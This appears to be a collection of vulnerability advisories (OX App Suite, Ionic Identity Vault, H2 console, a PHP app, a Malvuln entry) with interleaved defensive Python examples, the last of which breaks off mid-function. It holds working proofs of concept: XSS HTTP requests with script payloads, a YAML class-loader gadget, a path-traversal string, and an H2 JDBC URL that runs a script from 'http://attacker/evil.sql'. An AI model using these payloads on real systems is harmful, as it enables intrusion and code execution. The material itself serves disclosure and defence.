<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/b83836d7e6b0893e08d88a7850ca84ee.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.uq<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a PE file with a ".sys" extension to the C:\ drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: b83836d7e6b0893e08d88a7850ca84ee<br />Vuln ID: MVID-2022-0464<br />Dropped files: MIGBOT.SYS<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />C:\>cacls MIGBOT.SYS<br />C:\MIGBOT.SYS BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir MIGBOT.SYS<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />01/19/2022 06:27 PM 2,432 MIGBOT.SYS<br /> 1 File(s) 2,432 bytes<br /> 0 Dir(s) 27,604,955,136 bytes free<br /><br /><br />C:\>type MIGBOT.SYS<br />MZÉ @ !This program cannot be run in DOS mode.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Product: OX App Suite, OX Documents<br />Vendor: OX Software GmbH<br /><br /><br />Internal reference: MWB-993<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13<br />Vendor notification: 2021-03-09<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33489<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />Specific image formats use media-types that were not recognized by our sanitization engine. When HTML and JS code is injected into such files, it could bypass the sanitization methods.<br /><br />Risk:<br />Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Create an XCF image file and include JS code<br />2. Share the file using OX Drive sharing<br />3. Make someone click the direct link to the shared file<br /><br />Solution:<br />We improved the list of known unsafe media-types to make sure such content is handled as a binary file and download is enforced.<br /><br /><br /><br />---<br /><br /><br /><br />
Internal reference: MWB-1067<br />Vulnerability type: Code Injection (CWE-94)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13<br />Vendor notification: 2021-05-06<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33493<br />CVSS: 3.9 (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />The middleware component uses YAML for complex configuration constructs. The parser used for that purpose offers an insecure parsing method, which could be abused to inject arbitrary YAML-formatted Java classes that would be executed.<br /><br />Risk:<br />Arbitrary Java code could be executed in the context of the middleware process. To exploit this, a user with high privileges or a compromised workload would have to maliciously modify configuration files. These modifications are very likely to cause malfunction and keep the service from starting properly.<br /><br />Steps to reproduce:<br />1. Add YAML representation of Java classes to a configuration file<br />2. Reload configuration or restart<br /><br />Proof of concept:<br />!!javax.script.ScriptEngineManager [<br />  !!java.net.URLClassLoader [[<br />    !!java.net.URL ["http://example.open-xchange.com/"]<br />  ]]<br />]<br /><br />Solution:<br />We now use a parsing method that is limited to creating safe Java classes which are expected for configuration files.<br /><br /><br /><br />---<br /><br /><br /><br />
Internal reference: MWB-1094<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13<br />Vendor notification: 2021-05-20<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33490<br />CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />HTML content stored as a "snippet" does not get properly sanitized in case invalid HTML is stored.<br /><br />Risk:<br />Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would either need access to the victim's account or be part of the same context.<br /><br />Steps to reproduce:<br />1. Create a snippet with broken HTML code and store it as a (shared) mail signature<br />2. Make users select the malicious mail signature<br /><br />Solution:<br />We improved sanitization of snippets, including invalid HTML code.<br /><br /><br /><br />---<br /><br /><br /><br />
Internal reference: DOCS-3309<br />Vulnerability type: Relative Path Traversal (CWE-23)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: office<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev15, 7.10.4-rev9, 7.10.5-rev6<br />Vendor notification: 2021-03-23<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33491<br />CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L)<br /><br />Vulnerability Details:<br />External mail account discovery allows malicious users to append arbitrary URL paths to mail addresses. In combination with malicious auto-configuration DNS records, this can be abused to access web services outside of the expected trust boundary, regardless of existing blocklists.<br /><br />Risk:<br />Zip archives (like OOXML and ODF documents) might contain entries with relative paths pointing outside of the archive root. The extraction process uses the assigned paths, which makes it possible to overwrite files writable by the OX service user (e.g. log files).<br /><br />Steps to reproduce:<br />1. Create an OOXML or ODF file and modify the ZIP archive content table<br />2. Use a relative path that would overwrite or add files in unexpected locations<br />3. Use OX Documents to open such files<br /><br />Proof of concept:<br />../../../../../../../../../../../../../../../../../../../../tmp/foobar<br /><br />Solution:<br />We now prevent the extraction of files with relative paths outside of the expected working directories. A WARN message has been added to the log file whenever this happens.<br /><br /><br /><br />---<br /><br /><br /><br />
Internal reference: OXUIB-770<br />Vulnerability type: Improper Input Validation (CWE-20)<br />Vulnerable version: 7.10.5<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev12<br />Vendor notification: 2021-03-17<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33488<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />The "chat" component contains development-related hooks to provide the URL of the chat backend service. This can be used to redirect users to rogue OX Chat servers.<br /><br />Risk:<br />Users may disclose sensitive information to a non-trusted system or get harassed with unsolicited content. To exploit this, an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Set up a rogue OX Chat backend or mock service<br />2. Create a hyperlink pointing to that service<br />3. Make users click that link<br /><br />Proof of concept:<br />https://example.com/appsuite/#!!&app=io.ox/chat&chatHost=https://127.0.0.1:8000<br /><br />Solution:<br />We no longer accept user-provided input as configuration for client components.<br /><br /><br /><br />---<br /><br /><br /><br />
Internal reference: OXUIB-771<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev12<br />Vendor notification: 2021-03-17<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33492<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />Room names in OX Chat can be set to JS code fragments, which are not sufficiently sanitized before being added to the DOM of other room participants.<br /><br />Risk:<br />Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would need to be part of the same OX context as the victim.<br /><br />Steps to reproduce:<br />1. Create a chat room with JS code as title<br />2. Invite other users<br /><br />Solution:<br />We improved sanitization of room titles since they are user-provided information.<br /><br /><br /><br />---<br /><br /><br /><br />
Internal reference: OXUIB-809<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.4 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev30, 7.10.4-rev26<br />Vendor notification: 2021-04-16<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: To be assigned by the vulnerable component<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />OX App Suite uses the "blankshield" component to protect older browsers against "tabnabbing" attacks. A vulnerability was detected in this component, which could be used to run cross-site scripting attacks by injecting malicious hyperlinks into E-Mail and other content.<br /><br />Risk:<br />Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would require the victim to follow a hyperlink. The issue is related to browsers which are no longer supported by OX App Suite 7.10.5 or newer.<br /><br />Steps to reproduce:<br />1. Create an E-Mail with a hyperlink that contains malicious JS code<br />2. Send that E-Mail to the victim and make them follow the link<br /><br />Solution:<br />We provided a workaround for this issue in our code and to the upstream component.<br /><br /><br /><br />---<br /><br /><br /><br />
Internal reference: OXUIB-837<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev12<br />Vendor notification: 2021-05-06<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33494<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />An OX Chat method did not properly escape the room title when rendering the "typing" status and adding it to the DOM.<br /><br />Risk:<br />Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would need to be part of the same OX context as the victim.<br /><br />Steps to reproduce:<br />1. Create an OX Chat room with malicious code as title<br />2. Make users join and interact with this channel<br /><br />Solution:<br />We now escape user input, like the room title, when injecting it into the DOM.<br /><br /><br />---<br /><br /><br /><br />
Internal reference: OXUIB-838<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev12<br />Vendor notification: 2021-05-06<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33495<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />An OX Chat method did not properly escape the content of "system messages" when adding it to the DOM.<br /><br />Risk:<br />Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would need to be part of the same OX context as the victim.<br /><br />Steps to reproduce:<br />1. Create a system message in OX Chat that includes HTML/JS code<br />2. Make users join and interact with OX Chat<br /><br />Solution:<br />We escape all chat messages, including system messages, when injecting them into the DOM.<br /><br /></code></pre>
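Added example for the DOCS-3309 entry above (not OX's code): a Python extraction guard that resolves every ZIP entry name against the extraction root before writing it and logs a WARN for entries that escape, such as the advisory's `../../tmp/foobar` path. The archive is constructed inline; `safe_extract`, `is_inside` and `run_demo` are hypothetical names.

```python
import io
import logging
import os
import tempfile
import zipfile

# The advisory's PoC entry name, which climbs far above any extraction root.
TRAVERSAL_NAME = "../../../../../../../../../../../../../../../../../../../../tmp/foobar"


def build_sample_archive():
    """Constructed OOXML-like archive: one benign entry plus the traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(TRAVERSAL_NAME, "overwrite me")
    return buf.getvalue()


def is_inside(root, name):
    """True when the entry name, joined to root, still resolves under root.
    realpath() on both sides folds '..' segments and symlinked roots."""
    root_abs = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_abs, name))
    try:
        return os.path.commonpath([root_abs, target]) == root_abs
    except ValueError:  # different drives on Windows
        return False


def safe_extract(zip_bytes, root):
    """Extract only entries that stay under root; WARN and skip the rest."""
    outcome = {"extracted": [], "rejected": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if os.path.isabs(name) or not is_inside(root, name):
                logging.warning("zip entry %r escapes %s; skipped", name, root)
                outcome["rejected"].append(name)
                continue
            # Write the member ourselves so the check above is the only guard.
            dest = os.path.join(root, name)
            if info.is_dir():
                os.makedirs(dest, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(dest), exist_ok=True)
                with zf.open(info) as src, open(dest, "wb") as dst:
                    dst.write(src.read())
            outcome["extracted"].append(name)
    return outcome


def run_demo():
    """Extract the constructed archive into a fresh temp directory."""
    root = tempfile.mkdtemp()
    outcome = safe_extract(build_sample_archive(), root)
    outcome["document_on_disk"] = os.path.isfile(
        os.path.join(root, "word", "document.xml"))
    return outcome
```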
<pre><code># Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)<br /># Date: 19/01/2022<br /># Exploit Author: Felipe Alcantara (Filiplain)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Kali Linux<br /># Description: Stored XSS in multiple fields...<br /><br /># Steps to reproduce (with employee access)<br /><br /># Log in as an employee<br /># Go to: http://localhost/ptms/?page=user<br /># Add XSS payload to any field of the user's name.<br /># Click Update<br /><br /><br />=================<br />POST /ptms/classes/Users.php?f=save_employee HTTP/1.1<br />Host: localhost<br />Content-Length: 1339<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) <br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Origin: http://localhost<br />Referer: http://localhost/ptms/?page=user<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm<br />Connection: close<br /><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="id"<br /><br />4<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="code"<br /><br />2022-0003<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="generated_password"<br /><br /><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="firstname"<br /><br />Mark<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="middlename"<br /><br /><script>alert("XSS_TEST")</script><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="lastname"<br /><br />Cooper<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="gender"<br /><br />Male<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="department"<br /><br />IT Department<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="position"<br /><br />Department Manager<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="email"<br /><br />mcooper@sample.com<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="password"<br /><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak--<br />=================<br /><br />-----------------------------------------------------------------------------<br /><br />
# Steps to reproduce (with admin access)<br /><br /># Log in to the admin panel<br /># Go to: http://localhost/ptms/admin/?page=system_info<br /># Add XSS payload to the 'System Name' field<br /># Click Update<br /><br /><br />=================<br /><br />POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Content-Length: 603<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) <br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Origin: http://localhost<br />Referer: http://localhost/ptms/admin/?page=system_info<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm<br />Connection: close<br /><br />------WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Content-Disposition: form-data; name="name"<br /><br />Online Project Time Management System - PHP <script>alert("XSS")</script><br />------WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Content-Disposition: form-data; name="short_name"<br /><br />PTMS - PHP<br />------WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Content-Disposition: form-data; name="cover"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryCibB6pEzThjb4Zcq--<br /><br />=================<br /></code></pre>
<pre><code>#############################################################<br />#<br /># COMPASS SECURITY ADVISORY<br /># https://www.compass-security.com/research/advisories/<br />#<br />#############################################################<br />#<br /># Product: Identity Vault<br /># Vendor: Ionic<br /># CSNC ID: CSNC-2021-020<br /># CVE ID: CVE-2021-44033<br /># Subject: PIN Unlock Lockout Bypass (Android & iOS)<br /># Severity: Medium<br /># Effect: Authentication Bypass<br /># Author: Emanuel Duss <emanuel.duss@compass-security.com><br /># Date: 2021-11-19<br />#<br />#############################################################<br /><br />Introduction<br />------------<br /><br />Ionic Identity Vault is a secure storage solution for Android and iOS mobile<br />apps which can e.g. be used to store authentication information like access<br />tokens [1]. This information can be protected so that the user must<br />authenticate first before the information is unlocked.<br /><br />Identity Vault provides different authentication methods:<br /><br />- Memory only storage (not persisted at all)<br />- Secure storage (without user authentication)<br />- Passcode (PIN) authentication<br />- Biometric authentication (optionally with device PIN fallback)<br /><br />The Passcode (PIN) authentication mechanism can be configured with a lockout<br />counter, which will clear the secure storage after a specified number of failed<br />unlocks.<br /><br />During a customer project, we could bypass the PIN unlock lockout mechanism.<br />This allows an attacker with physical access to the device to brute force all<br />possible unlock PIN combinations without being blocked.<br /><br /><br />Affected<br />--------<br /><br />- Vulnerable: Ionic Identity Vault <= 5.0.4<br />- Not vulnerable: Ionic Identity Vault >= 5.0.5<br /><br /><br />Description<br />-----------<br /><br />The failed unlock counter is only stored in memory and can therefore be<br />bypassed. An attacker with physical access to the phone is therefore able to<br />brute force the PIN of the user without being blocked.<br /><br />For example, if the lockout threshold is set to 5, an attacker can perform 4<br />failed unlocks and close the app to clear the failed unlock counter. The app can<br />then be opened again to get 4 more unlock attempts. This can be repeated until<br />the correct PIN is found.<br /><br /><br />Technical Description<br />---------------------<br /><br /># Vulnerability<br /><br />On Android, the logic of the lockout functionality is implemented in the<br />`getData` method of the `com.ionicframework.IdentityVault.VaultBase` class.<br />This method tracks the count of failed authentication attempts and clears the<br />vault once the configured number of allowed failed unlocks is reached:<br /><br />    public void getData() throws VaultError {<br />        try {<br />            if (this.data == null) {<br />                // [...]<br />            }<br />        } catch (AuthFailedError e) {<br />            lock();<br />            // counter only ever lives in this field; nothing persists it<br />            int I = this.failedUnlockAttempts + 1;<br />            this.failedUnlockAttempts = I;<br />            if (I >= this.allowedInvalidUnlockAttempts) {<br />                clear();<br />                this.failedUnlockAttempts = 0;<br />                throw new TooManyFailedAttemptsError();<br />            }<br />            throw e;<br />        } catch (Exception e2) {<br />            throw new VaultError(e2.getLocalizedMessage());<br />        }<br />    }<br /><br />This shows that the failed unlock count `failedUnlockAttempts` is not stored<br />anywhere and is only kept in memory.<br /><br />The code on iOS looks similar and therefore the same vulnerability applies to<br />both Android and iOS.<br /><br /><br /># Exploit<br /><br />The following steps can be performed to bypass the limit on unlock<br />attempts and get endless tries:<br /><br />- Open the app<br />- Try several PIN unlock attempts, stopping before the last possible attempt which<br />  would clear the secure storage<br />- Close the app (this will clear the `failedUnlockAttempts`)<br />- Start at the first step again and try the next PINs.<br /><br />All these steps can be automated by using the Android Debug Bridge (adb) [2].<br /><br /><br />Vulnerability Classification<br />----------------------------<br /><br />CVSS v3.1 Metrics [3]:<br /><br />- CVSS Base Score: 5.9 (Medium)<br />- CVSS Vector: AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N<br /><br /><br />Workaround / Fix<br />----------------<br /><br /># Ionic Identity Vault Library Vendor<br /><br />A counter of the failed unlock attempts should be stored on the phone. This<br />counter should only be readable by the app itself and not by other apps. It can,<br />e.g., be stored in the application directory.<br /><br />Note: An attacker with root access on the phone can always bypass such lockout<br />mechanisms by hooking the functions which perform the check. A lockout counter<br />stored in the application directory still protects against non-root attackers.<br />It's therefore not necessary to specially protect/encrypt the failed unlock<br />counter.<br /><br /><br /># Ionic Identity Vault Library Users<br /><br />Customers of the Ionic Identity Vault should use the updated version Identity<br />Vault 5.0.5, which fixes the issue [4].<br /><br /><br />Timeline<br />--------<br /><br />2021-08-05: Vulnerability discovered<br />2021-09-06: Informed Ionic about the vulnerability<br />2021-09-07: Ionic told they will fix it and inform me when the fix is available<br />2021-10-25: Asked Ionic about the current state<br />2021-10-25: Ionic told it's already fixed.<br />2021-11-18: Requested CVE ID @ MITRE<br />2021-11-19: Assigned CVE-2021-44033<br />2021-11-19: Coordinated public disclosure<br /><br /><br />References<br />----------<br /><br />[1] https://ionic.io/docs/identity-vault<br />[2] https://developer.android.com/studio/command-line/adb<br />[3] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N&version=3.1<br />[4] https://ionic.io/docs/identity-vault/changelog --> [5.0.5] (2021-09-30)<br /><br /><br /><br /></code></pre>
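Added example, not Ionic's code: a Python model of the lockout counter from the Technical Description above, with the in-memory variant beside one that persists the count to a file in the app's own directory as the Workaround / Fix section suggests, and a replay of the open / guess / close loop to show which variant actually clears the vault. The PIN, the candidate list and the class and function names are constructed for this example.

```python
import hmac
import json
import os
import tempfile


class InMemoryLockout:
    """Mirrors the vulnerable VaultBase.getData logic: the failed-attempt
    counter lives only in the object, so a fresh instance (an app restart)
    starts again from zero."""

    def __init__(self, pin, allowed_invalid_unlock_attempts):
        self._pin = pin
        self.allowed = allowed_invalid_unlock_attempts
        self.failed = 0
        self.cleared = False  # set when the vault wipes its contents

    def unlock(self, attempt):
        if hmac.compare_digest(attempt, self._pin):
            self.failed = 0
            return True
        self.failed += 1
        if self.failed >= self.allowed:
            self.cleared = True  # clear(): storage is wiped
            self.failed = 0
        return False


class PersistentLockout(InMemoryLockout):
    """Same decision logic, but the counter is loaded from, and written back
    to, a file in the app's private directory, so re-creating the object
    (closing and reopening the app) does not reset it."""

    def __init__(self, pin, allowed_invalid_unlock_attempts, state_path):
        super().__init__(pin, allowed_invalid_unlock_attempts)
        self.state_path = state_path
        self._load()

    def _load(self):
        try:
            with open(self.state_path) as f:
                state = json.load(f)
        except (OSError, ValueError):
            return  # first run: no state yet
        self.failed = int(state.get("failed", 0))
        self.cleared = bool(state.get("cleared", False))

    def _save(self):
        # Owner-only temp file, then an atomic rename: a kill mid-write cannot
        # lose the count, and other apps (non-root) cannot read or reset it.
        tmp = self.state_path + ".tmp"
        fd = os.open(tmp, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        with os.fdopen(fd, "w") as f:
            json.dump({"failed": self.failed, "cleared": self.cleared}, f)
        os.replace(tmp, self.state_path)

    def unlock(self, attempt):
        ok = super().unlock(attempt)
        self._save()
        return ok


def guesses_before_clear(make_vault, allowed, candidates):
    """Replay the advisory's loop: allowed-1 wrong guesses per 'app session',
    then a restart (a new vault object), repeated over the candidate list.
    Returns how many wrong guesses were accepted before the vault cleared;
    len(candidates) means it never cleared."""
    guesses = 0
    while guesses < len(candidates):
        vault = make_vault()
        if vault.cleared:
            break
        for _ in range(allowed - 1):
            if guesses >= len(candidates):
                break
            vault.unlock(candidates[guesses])
            guesses += 1
            if vault.cleared:
                return guesses
    return guesses


def demo(allowed=5, n_candidates=50):
    """Constructed PIN '9999' against 50 wrong candidates 0000..0049."""
    candidates = ["%04d" % i for i in range(n_candidates)]
    in_memory = guesses_before_clear(
        lambda: InMemoryLockout("9999", allowed), allowed, candidates)
    state_path = os.path.join(tempfile.mkdtemp(), "lockout.json")
    persistent = guesses_before_clear(
        lambda: PersistentLockout("9999", allowed, state_path), allowed, candidates)
    return {"in_memory": in_memory, "persistent": persistent}
```

With a threshold of 5, the in-memory counter accepts all 50 wrong guesses (4 per session, never clearing), while the persisted counter clears the vault on the 5th wrong guess across sessions.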
<pre><code>Document Title<br />===============<br />Unauthenticated RCE vulnerability in the H2 Database console: CVE-2022-23221.<br /><br />Product Description<br />===============<br />The H2 Console Application<br /><br />The Console lets you access a SQL database using a browser interface.<br /><br />Homepage: http://www.h2database.com/html/quickstart.html<br /><br />Affected Components<br />===============<br />File Name: WebServer.java<br />File Path: /h2database/h2/src/main/org/h2/server/web/WebServer.java<br />Impacted Function: getConnection<br /><br />PoC<br />===============<br /><br />1) Navigate to the console and attempt to connect to an H2 in-memory<br />database that does not exist using the following JDBC URL:<br /><br />```<br />jdbc:h2:mem:1337;<br />```<br /><br />2) Note that you get the following security exception preventing you<br />from creating a new in-memory database:<br /><br />```<br />Database "mem:1337" not found, either pre-create it or allow remote<br />database creation (not recommended in secure environments) [90149-209]<br />90149/90149 (Help)<br />```<br /><br />3) Now try again with the following JDBC URL:<br /><br />```<br />jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\<br />```<br /><br />4) Note that you were able to successfully create a new in-memory database<br />5) Create a SQL file that contains a trigger that executes<br />java/javascript/ruby code when executed and host it on a domain you<br />control (ex: http://attacker)<br />6) Use the following JDBC URL to execute the SQL file hosted on your<br />domain on connect:<br /><br />```<br />jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT<br />FROM 'http://attacker/evil.sql';'\<br />```<br /><br />Example evil.sql file:<br /><br />```<br />CREATE TABLE test (<br />  id INT NOT NULL<br />);<br /><br />CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript<br />var fos = Java.type("java.io.FileOutputStream");<br />var b = new fos ("/tmp/pwnedlolol");';<br /><br />INSERT INTO TEST VALUES (1);<br />```<br /><br />CVE Issued: CVE-2022-23221<br /><br /><br /></code></pre>
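Added example, not part of the advisory or of H2 itself: a Python check that splits an H2 console JDBC URL into its `;`-separated settings and flags the ones the PoC above relies on (`INIT`, `FORBID_CREATION=FALSE`, `IGNORE_UNKNOWN_SETTINGS`), plus any trailing fragments that are not `KEY=VALUE` settings, for reviewing console access logs or gating what a front end passes on. Case-insensitive key matching and the function names are assumptions; the sample inputs are the three connection strings from the advisory.

```python
from urllib.parse import unquote

# Settings the advisory's PoC combines; none of them should be accepted from
# a browser-supplied connection string.
RISKY_SETTINGS = {
    "INIT": "runs SQL on connect (the PoC uses RUNSCRIPT FROM a remote URL)",
    "FORBID_CREATION": "FALSE re-enables creation of databases that do not exist",
    "IGNORE_UNKNOWN_SETTINGS": "silences errors that would otherwise reject the URL",
}


def parse_h2_url(url):
    """Split 'jdbc:h2:<base>;KEY=VALUE;...' into the base, a settings dict and
    leftover fragments that are not KEY=VALUE pairs. Percent-encoding is
    undone first because the console receives the URL from a form post."""
    url = unquote(url)
    if not url.lower().startswith("jdbc:h2:"):
        raise ValueError("not an H2 JDBC URL")
    base, *rest = url.split(";")
    settings, leftovers = {}, []
    for seg in rest:
        seg = seg.strip()
        if not seg:
            continue
        if "=" in seg:
            key, value = seg.split("=", 1)
            settings[key.strip().upper()] = value.strip()  # case-insensitive keys (assumption)
        else:
            leftovers.append(seg)
    return base, settings, leftovers


def audit_h2_url(url):
    """Findings for one console connection attempt as (key, detail) tuples.
    An empty list means only the base URL (and harmless settings) was given."""
    base, settings, leftovers = parse_h2_url(url)
    findings = []
    for key, why in RISKY_SETTINGS.items():
        if key not in settings:
            continue
        if key == "FORBID_CREATION" and settings[key].upper() != "FALSE":
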